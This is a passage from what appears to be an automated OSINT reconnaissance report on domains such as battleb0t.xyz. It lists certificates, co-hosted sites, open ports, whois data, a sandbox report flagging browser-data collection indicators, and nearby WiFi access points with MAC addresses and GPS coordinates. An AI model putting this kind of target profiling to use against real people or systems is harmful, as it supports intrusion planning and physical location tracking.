N/A]\n "jquery.cookie.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "C1TXDP2K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1TXDP2K.txt]- [targetUID: 00000000-00001416]\n "NN4OYYV3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NN4OYYV3.txt]- [targetUID: 00000 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Computing websites | cdn-185-199-111-153.github.com |
| 2023-05-12 03:03:40 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01010101lzy.github.io |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 472 (Net ID: 00:02:2D:C3:4A:5F) | 37.7642, -122.3993 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom1372 (Net ID: 00:01:38:85:A8:E5) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.40): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:08:54 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.72 | 34.74.170.74 |
| 2023-05-12 02:55:25 | Linked URL - Internal | No | Google | 0 | 0 | 2 | 0 | None | https://www.ayhu.xyz/ | www.ayhu.xyz |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | YouTube User (Category: video)
https://www.youtube.com/user/baptistevauthey/about | baptistevauthey |
| 2023-05-12 02:56:09 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:37:68:7b:1f:26:29:cd:a4:cc:95:52:df:e2:0a:12:6f:13
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 13 15:23:51 2023 GMT
Not After : May 14 15:23:50 2023 GMT
Subject: CN=nuke.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d9:29:5b:18:4c:1d:e8:59:eb:db:25:91:54:31:
ed:38:23:ab:0a:88:57:5c:ef:0c:7e:ca:ca:6c:71:
0b:02:fd:19:3d:6a:e8:97:28:77:25:12:e6:41:af:
0c:74:de:eb:50:90:97:94:e1:fd:e0:db:78:3a:0a:
5f:ae:54:a8:1f:8e:40:46:da:de:c8:9e:fa:c8:e7:
39:8e:1b:9f:5e:60:ec:47:c4:47:f9:79:27:17:65:
24:54:e3:e9:87:77:9b:2d:fc:59:b6:69:6a:35:59:
71:49:6c:3f:68:b3:6f:f3:47:8d:99:d8:26:4a:34:
e5:bd:98:64:13:9c:bc:2e:32:d9:f1:82:53:39:a9:
0e:5a:3e:f4:44:ad:26:19:df:02:ae:0a:8a:ee:fc:
9b:3e:7d:da:ca:fc:e7:ee:68:4f:c5:8c:ef:dc:74:
06:e9:7a:47:71:5f:53:c7:6d:09:e9:1f:2a:81:e3:
aa:4a:4a:ad:ae:9d:25:b9:f8:c2:d3:14:56:b4:75:
91:e9:be:73:0e:b4:7d:4d:da:64:95:77:6d:43:79:
73:49:a5:8a:21:01:8b:43:f7:7e:6b:34:db:43:cb:
18:86:96:0e:e7:1a:02:5a:4f:df:42:dd:88:c3:61:
4d:6b:c6:c6:bf:25:5b:76:f4:0e:86:dd:ad:d2:26:
a8:0b:2a:9a:7b:42:50:c1:2c:92:f7:92:ae:7c:b1:
d3:11:4f:23:ac:54:f9:9e:aa:91:2b:7c:ed:1c:c1:
46:1b:9b:3c:a0:2a:b1:e3:e2:b9:d0:7f:06:57:c9:
1e:63:2a:89:4d:e0:fc:34:28:ec:5f:72:15:f2:01:
80:22:e3:d2:bf:66:7b:78:f3:2a:37:36:d0:18:e7:
eb:62:58:1a:53:3f:4a:aa:c6:06:93:11:2e:9b:de:
b2:20:c5:30:35:f7:4b:de:99:68:8b:4d:f1:cf:5f:
e0:29:92:a1:d4:25:53:f6:6b:8d:eb:c8:2f:a1:48:
f6:93:3d:2d:29:1c:93:8a:83:6e:a8:d5:40:07:99:
d9:b4:ed:f4:2d:5b:2c:94:69:23:83:3f:eb:1f:20:
45:ea:f5:f6:5a:22:b5:7a:ea:e6:92:ef:69:3a:86:
e9:7d:cc:89:f5:72:d8:75:21:3a:fd:e8:3a:fd:dd:
16:43:3a:20:cf:8c:1c:3f:54:62:be:57:b4:91:f9:
1f:7b:59:bb:69:98:ad:21:46:6b:14:0b:f3:32:e9:
f3:42:4c:fe:3e:ea:f8:50:4d:7c:e3:49:32:31:e8:
73:54:2a:f5:e6:ac:fb:17:66:a1:41:7a:05:04:c9:
53:ab:bd:62:a2:65:3e:e4:d9:bf:f3:5f:60:e6:ba:
3c:1f:a9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D9:CF:28:31:E6:B0:52:A6:B3:E5:82:F1:AF:FD:4B:16:99:CF:87:98
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nuke.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 13 16:23:51.711 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:74:49:47:F4:26:47:0D:47:E2:9A:66:AF:
F3:3B:46:53:9D:6A:00:FC:C4:5B:6D:E9:3D:6A:E5:A3:
AC:D8:18:26:02:21:00:F0:DF:BE:68:08:A5:73:33:B8:
41:78:C8:F1:1D:97:89:D0:3C:53:99:EC:D3:37:A8:F1:
3C:4D:2D:2A:6D:AA:99
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 13 16:23:51.724 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:C5:F1:D7:EC:63:EF:D2:2B:1D:83:7B:
83:54:8D:82:F0:09:7B:86:48:A1:52:8A:D7:9F:9A:A4:
8F:C9:E6:6D:A9:02:21:00:BF:BA:DA:57:96:9F:75:77:
05:96:B4:C2:FA:F6:06:66:B5:84:A9:CC:F1:BA:83:9B:
82:75:E0:63:24:71:36:67
Signature Algorithm: sha256WithRSAEncryption
85:63:54:da:d2:e7:1a:fb:ec:3f:3a:27:f7:a7:67:fe:c8:7b:
01:a2:64:e4:ee:ee:8e:f0:73:aa:5c:d0:77:bb:6f:be:12:26:
63:92:52:2b:90:c5:19:0c:01:d9:fb:68:bc:45:29:22:6d:35:
24:74:65:da:4b:43:d7:65:1a:2d:49:c6:90:fb:fd:df:39:3b:
cf:ed:9d:e1:a6:3d:3e:a0:05:2d:c4:03:55:00:85:97:89:e2:
1e:88:22:b2:ee:28:86:0f:c1:b8:e5:17:29:7c:e7:e3:6e:66:
99:6b:e8:89:3f:2e:a5:71:74:a0:b7:70:7a:4e:d4:b2:8a:69:
b1:f7:4b:20:bd:fb:7b:d5:07:9a:0c:c6:99:dd:4b:3f:c8:5e:
41:b1:8e:dd:2a:1a:39:aa:08:e2:1e:e6:e3:63:8f:d4:59:98:
ae:0a:7d:59:e3:fc:7d:a9:1f:51:9d:83:fc:16:e1:80:20:2f:
21:21:50:dd:de:43:12:b9:29:89:20:37:79:64:39:a0:00:fa:
b9:f2:d1:d6:97:d7:a4:ad:65:b2:7e:a9:68:2b:1e:77:25:f0:
a5:6a:9b:71:2e:77:c5:cb:51:1f:d8:52:be:f1:4f:2f:03:bf:
1b:74:58:57:b0:dc:c1:17:3e:44:8c:02:67:40:b6:b2:69:3c:
5b:81:25:af
| battleb0t.xyz |
| 2023-05-12 03:23:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.9:8443 | 188.114.96.0/24 |
| 2023-05-12 03:03:16 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | mail.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 03:24:21 | Linked URL - Internal | No | Web Spider | 5 | 0 | 2 | 0 | None | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU | https://ayhu.xyz/lol.html |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Allstate 2.4G (Net ID: 00:02:6F:F8:0A:40) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:00:49 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.67): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | cloudwaysapps.com | 64.226.81.43 |
| 2023-05-12 03:00:51 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 000.ovh | 185.199.111.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | phi (Net ID: 00:06:B1:2D:D2:D1) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:57:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 10, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://develop--lifecard-basic.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5672:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5672:120:WilError_01"\n "Local\\SM0:5580:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:5580:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5672:120:WilError_01"\n "Local\\SM0:5672:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5676:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://develop--lifecard-basic.netlify.app/"\n Pattern match: "https://develop--lifecard-basic.netlify.app"'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE4-12014391507\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\966b4622-5189-4715-ace7-32781c511d01" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE4-26614537913\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE6-26619492266\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE6-50648112176\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Bookmarks" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE2-65382453450\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Bookmarks.msbak" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE2-65382453450\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007352-00000BE4-161466459\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\reports" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007352-00000BE4-164012001\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\attachments" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007352-00000BE4-166951574\n "--type=crashpad-handler "--user-data-dir=%LOCALAPPDATA%\\Microsoft\\Edge\\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=103.0.5060.53 "--annotation=exe=%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=103.0.1264.37 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd8,0x7ff9146190b8,0x7ff9146190c8,0x7ff9146190d8" (Indicator: "microsoft\\edge\\user data") in Source: msedge.exe'}], u'threat_level': 0, u'size': None, u'job_id': u'637eba44d524a07f2576099e', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'suspicious_identifiers': [], u'attck_id': u'T1005', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Data from Local System', u'informative_identifiers': [], u'tactic': u'Collection', u'informative_identifiers_count': 0, u'suspicious_identifiers_count': 1}], u'certificates': [], u'hosts': [u'34.148.97.127'], u'sha256': u'025407f1cd178ff7c81c5b101ca381ce72f5056e2ae85a03b5184adbb9151083', u'sha512': u'68475e41725f628b8af418c7f8123130b34e9b9627d9378d7adbfd41d9af4bbb930e36e05c418c7477a17d81df67a8d6f0fcba60f9094f21b33f41363ec82ae3', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://develop--lifecard-basic.netlify.app/', u'submission_id': u'637eba44d524a07f2576099f', u'created_at': u'2022-11-24T00:26:44+00:00', u'filename': None}], u'analysis_start_time': u'2022-11-24T00:30:54+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 4, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'3633daa5dd9513875472344179c1fb32', u'network_mode': u'default', u'processes': [], u'sha1': u'a04be0e448fafc36381b730c03d0fd075779e81d', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 10 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 34.148.97.127 |
| 2023-05-12 02:54:54 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c5a6f150a072cb8-ORD"]} | 2a06:98c1:3121::1 |
| 2023-05-12 02:56:50 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:aa:0b:fb:f5:72:57:f7:90:57:35:0a:22:0c:3a:41:5a:d1
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:48:35 2023 GMT
Not After : Apr 14 17:48:34 2023 GMT
Subject: CN=funny-face-pictures.nom-nom.link
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:bd:1c:66:69:41:70:5a:26:6b:f9:5d:75:98:b4:
8f:50:49:99:4a:13:c7:34:5d:07:06:03:17:45:62:
35:db:24:d3:13:a5:28:c9:bc:9e:26:03:0e:28:c7:
d0:92:34:41:85:ff:c9:ec:be:04:85:ca:56:f3:8d:
46:7d:03:91:0a
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D0:E0:AC:A3:54:40:02:9F:45:F6:D9:F1:FF:DC:7A:58:77:FF:5A:B0
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny-face-pictures.nom-nom.link, DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 14 18:48:35.447 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:23:7B:64:B6:2C:AC:F5:E8:CA:03:17:B5:
C8:52:1F:78:4E:9E:45:71:9E:BA:A5:B9:28:E2:F6:98:
5C:9C:55:4D:02:21:00:C5:7A:6D:7B:D9:FC:31:BE:EE:
D2:45:60:40:E8:F3:98:F6:00:28:61:5C:51:F5:50:E2:
F1:BC:67:67:34:47:34
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 14 18:48:35.442 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:77:EF:CC:3A:63:43:C6:E6:6C:CD:36:4F:
64:00:42:35:30:9C:67:0E:E7:F4:15:29:43:E9:0B:EB:
EA:B5:DD:47:02:20:43:3C:D6:F2:D6:6A:25:2C:8C:A9:
19:78:E2:12:1F:E6:13:A2:C8:59:FC:58:1D:CC:B7:3C:
FE:5E:08:B2:25:67
Signature Algorithm: sha256WithRSAEncryption
26:53:65:d8:0f:da:9d:5c:c2:89:7f:e9:59:db:82:df:21:01:
bc:a3:b0:96:ec:a1:79:53:d3:6d:a2:73:a4:48:f5:f3:60:37:
2f:d6:c2:bc:34:d6:5c:7b:52:5d:a2:86:c6:22:cc:0d:88:a5:
09:9e:b7:e0:33:0e:94:6a:31:dd:1a:ce:0b:4a:1b:35:81:e8:
18:b8:67:35:7b:c5:55:5b:fa:24:e1:61:d8:fc:4c:fb:0b:69:
6d:b7:e9:88:a8:d9:f4:30:10:9e:d7:62:ac:85:d6:f5:b8:e4:
d1:e1:dd:33:91:22:79:d9:d1:27:2a:78:63:a1:7e:92:44:93:
5d:7f:b9:50:5b:7c:41:db:0c:39:77:23:a9:bf:96:10:23:77:
56:f9:ce:90:f2:c8:df:fc:44:22:77:ff:3a:73:64:da:f9:9d:
43:b8:69:0a:60:9d:7e:36:25:20:ea:05:1d:9b:94:cd:ee:68:
aa:a6:47:3a:63:73:de:dd:31:b0:d6:03:9e:95:3c:99:1c:f5:
c1:10:0c:3b:9b:5b:bb:2b:91:5b:f8:0b:8e:c1:0a:80:b1:82:
3c:fb:af:ea:e3:db:58:02:64:c3:ab:7a:c9:4d:e2:fc:10:3c:
ec:06:e0:99:ff:1b:90:aa:e6:ba:48:4e:20:e1:c2:59:01:96:
cd:48:36:11
|
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Apple Network 079699 (Net ID: 00:02:2D:07:96:99) | 37.7642, -122.3993 |
| 2023-05-12 02:45:34 | Email Gateway (DNS MX Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | route1.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:12:16 | Co-Hosted Site - Domain Whois | No | Whois | 3 | 0 | 5 | 0 | None | Domain Name: ECASH-PAY.COM
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15Z
Creation Date: 2021-04-26T06:58:38Z
Registry Expiry Date: 2024-04-26T06:58:38Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
